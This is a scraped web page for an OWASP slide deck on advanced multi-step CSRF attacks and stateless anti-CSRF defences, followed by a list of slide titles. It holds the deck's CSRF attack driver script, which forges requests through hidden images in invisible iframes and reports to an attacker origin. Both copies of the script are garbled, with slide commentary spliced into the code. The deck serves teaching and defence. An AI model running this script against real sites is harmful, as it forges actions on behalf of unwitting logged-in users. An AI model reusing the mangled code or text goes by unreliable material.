Advanced CSRF and Stateless Anti-CSRF - owasp

More documents

Recommendations

Info

var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgElement; if(parent != undefined) { The parent.postMessage(IFRAME_ID, GET <strong>CSRF</strong> is executed with an "https://attackr.se:8444"); } if(!IFRAME_GETTER.haveGotten) { imgElement = document.createElement("img"); imgElement.setAttribute("src", GET_SRC); imgElement.setAttribute("height", "0"); imgElement.setAttribute("width", "0"); imgElement.setAttribute("onerror", "javascript:clearInterval(IFRAME_GETTER.intervalId)"); document.body.appendChild(imgElement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setInterval(IFRAME_GETTER.reportAndGet, 1000); }; iframeGetter.js
The onerror event will fire var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten since the vulnerable = false; URL does IFRAME_GETTER.reportAndGet = function() { var imgElement; not respond with an image. We if(parent != undefined) { use that event to stop the parent.postMessage(IFRAME_ID, heart beat function. "https://attackr.se:8444"); No heart } if(!IFRAME_GETTER.haveGotten) beat means the main { page imgElement knows = this document.createElement("img"); step is done <strong>and</strong> imgElement.setAttribute("src", GET_SRC); imgElement.setAttribute("height", can continue opening the "0"); next imgElement.setAttribute("width", iframe. "0"); imgElement.setAttribute("onerror", "javascript:clearInterval(IFRAME_GETTER.intervalId)"); document.body.appendChild(imgElement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setInterval(IFRAME_GETTER.reportAndGet, 1000); }; iframeGetter.js
Page 1 and 2: Advanced CSRF and Stateless Anti-CS
Page 3 and 4: Some Quick CSRF Basics
Page 5 and 6: Cross-Site Request Forgery Request
Page 7 and 8: What’s on your mind? I love OWASP
Page 9 and 10: What’s on your mind? POST What’
Page 11 and 12: What’s on your mind? POST What’
Page 13 and 14: What’s on your mind? John: I hate
Page 15 and 16: Multi-Step, Semi-Blind CSRF
Page 17 and 18: Step 1 Step 2 Step 3 Forged request
Page 19 and 20: csrfMultiDriver.html invisible ifra
Page 25 and 26: Invisible iframe for timed GET
Page 27 and 28: When var IFRAME_ID the iframe's
Page 29 and 30: var IFRAME_GETTER = {}; IFRAME_GETT
Page 31: var IFRAME_GETTER = {}; IFRAME_GETT
Page 35 and 36: POST var IFRAME_ID = "1"; In
Page 37 and 38: var IFRAME_ID = "1"; called.
Page 39 and 40: var IFRAME_POSTER = {}; IFRAME_POST
Page 41 and 42: var IFRAME_POSTER = {}; IFRAME_POST
Page 43 and 44: eturn { checkIFrames : function() {
Page 45 and 46: There used to be a protection in we
Page 47 and 48: Forced Browsing wizard-style Shipme
Page 49 and 50: Forced Browsing wizard-style Token
Page 51 and 52: Forced Browsing wizard-style Token
Page 53 and 54: RIA & client-side state { ”purcha
Page 59 and 60: Can an attacker forge such a JSON s
Page 61 and 62: CSRF possible? { ”purchase”: {
Page 63 and 64:
Page 65 and 66: Forms produce a request body that l
Page 67 and 68: like this: ... and that is accepta
Page 69 and 70: like this: ... and that is JSON!
Page 71 and 72: Important in your REST API • •
Page 73 and 74: Double Submit (CSRF protection) Ant
Page 75 and 76: Double Submit (CSRF protection) Ant
Page 77 and 78: Are We Fully Protected Now?
Page 79 and 80: The Other Subdomain https://securis
Page 81 and 82: The Other Subdomain https://securis
Page 83 and 84:
I'm proposing some sort of Triple S
Page 85 and 86:
Triple Submit (CSRF protection) Ran
Page 87 and 88:
The 3rd Submit • The server sets
Page 89 and 90:
The 3rd Submit • The server sets
Page 91 and 92:
My Demo System is Being Released as
show all

Advanced CSRF and Stateless Anti-CSRF - owasp

Create successful ePaper yourself

Delete template?

Save as template?